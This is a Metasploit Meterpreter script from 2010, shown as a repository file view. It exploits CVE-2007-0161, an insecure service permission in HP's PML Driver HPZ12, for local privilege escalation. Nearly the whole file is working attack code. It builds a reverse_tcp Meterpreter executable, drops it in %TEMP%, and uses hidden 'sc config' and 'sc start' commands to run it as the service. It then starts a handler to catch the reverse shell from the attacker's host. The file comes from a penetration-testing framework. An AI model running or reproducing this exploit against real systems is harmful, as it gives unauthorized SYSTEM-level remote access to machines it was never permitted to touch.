root / scripts / meterpreter / pml_driver_config.rb
History | View | Annotate | Download (3 KB)
| 1 | # $Id: pml_driver_config.rb 8734 2010-03-07 22:49:08Z hdm $
|
|---|---|
| 2 | ##
|
| 3 | # This file is part of the Metasploit Framework and may be subject to
|
| 4 | # redistribution and commercial restrictions. Please see the Metasploit
|
| 5 | # Framework web site for more information on licensing and terms of use.
|
| 6 | # http://metasploit.com/projects/Framework/
|
| 7 | ##
|
| 8 | |
| 9 | ##
|
| 10 | # HP Multiple Products PML Driver HPZ12 Local Privilege Escalation.
|
| 11 | #
|
| 12 | # This module exploits a privilege escalation vulnerability in
|
| 13 | # Hewlett-Packard's PML Driver HPZ12. Due to an insecure
|
| 14 | # SERVICE_CHANGE_CONFIG DACL permission, a local attacker can
|
| 15 | # gain elevated privileges.
|
| 16 | #
|
| 17 | # BID - 21935
|
| 18 | # CVE - 2007-0161
|
| 19 | # mc[@]metasploit.com
|
| 20 | ##
|
| 21 | |
| 22 | #
|
| 23 | # Options
|
| 24 | #
|
| 25 | opts = Rex::Parser::Arguments.new( |
| 26 | "-h" => [ false, "This help menu"], |
| 27 | "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], |
| 28 | "-p" => [ true, "The port on the remote host where Metasploit is listening"] |
| 29 | ) |
| 30 | |
| 31 | #
|
| 32 | # Default parameters
|
| 33 | #
|
| 34 | |
| 35 | rhost = Rex::Socket.source_address("1.2.3.4") |
| 36 | rport = 4444
|
| 37 | |
| 38 | #
|
| 39 | # Option parsing
|
| 40 | #
|
| 41 | opts.parse(args) do |opt, idx, val|
|
| 42 | case opt
|
| 43 | when "-h" |
| 44 | print_status("HP PML Driver HPZ12 SERVICE_CHANGE_CONFIG privilege escalation.")
|
| 45 | print_line(opts.usage) |
| 46 | raise Rex::Script::Completed |
| 47 | when "-r" |
| 48 | rhost = val |
| 49 | when "-p" |
| 50 | rport = val.to_i |
| 51 | end
|
| 52 | end
|
| 53 | |
| 54 | client.sys.process.get_processes().each do |m|
|
| 55 | if ( m['name'] =~ /HPZipm12\.exe/ ) |
| 56 | |
| 57 | print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
|
| 58 | |
| 59 | # Build out the exe payload.
|
| 60 | pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
|
| 61 | pay.datastore['LHOST'] = rhost
|
| 62 | pay.datastore['LPORT'] = rport
|
| 63 | raw = pay.generate |
| 64 | |
| 65 | exe = Msf::Util::EXE.to_win32pe(client.framework, raw) |
| 66 | |
| 67 | # Place our newly created exe in %TEMP%
|
| 68 | tempdir = client.fs.file.expand_path("%TEMP%")
|
| 69 | tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" |
| 70 | print_status("Sending EXE payload '#{tempexe}'.")
|
| 71 | fd = client.fs.file.new(tempexe, "wb")
|
| 72 | fd.write(exe) |
| 73 | fd.close |
| 74 | |
| 75 | print_status("Stopping service \"Pml Driver HPZ12\"...")
|
| 76 | client.sys.process.execute("cmd.exe /c sc stop \"Pml Driver HPZ12\" ", nil, {'Hidden' => 'true'}) |
| 77 | |
| 78 | print_status("Setting Pml Driver to #{tempexe}...")
|
| 79 | client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= #{tempexe}", nil, {'Hidden' => 'true'}) |
| 80 | sleep(1)
|
| 81 | print_status("Restarting the \"Pml Driver HPZ12\" service...")
|
| 82 | client.sys.process.execute("cmd.exe /c sc start \"Pml Driver HPZ12\" ", nil, {'Hidden' => 'true'}) |
| 83 | |
| 84 | # Our handler to recieve the callback.
|
| 85 | handler = client.framework.exploits.create("multi/handler")
|
| 86 | handler.datastore['WORKSPACE'] = client.workspace
|
| 87 | handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" |
| 88 | handler.datastore['LHOST'] = rhost
|
| 89 | handler.datastore['LPORT'] = rport
|
| 90 | handler.datastore['ExitOnSession'] = false |
| 91 | |
| 92 | handler.exploit_simple( |
| 93 | 'Payload' => handler.datastore['PAYLOAD'], |
| 94 | 'RunAsJob' => true |
| 95 | ) |
| 96 | |
| 97 | client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= %SystemRoot%\\system32\\HPZipm12.exe", nil, {'Hidden' => 'true'}) |
| 98 | |
| 99 | end
|
| 100 | end
|
| 101 |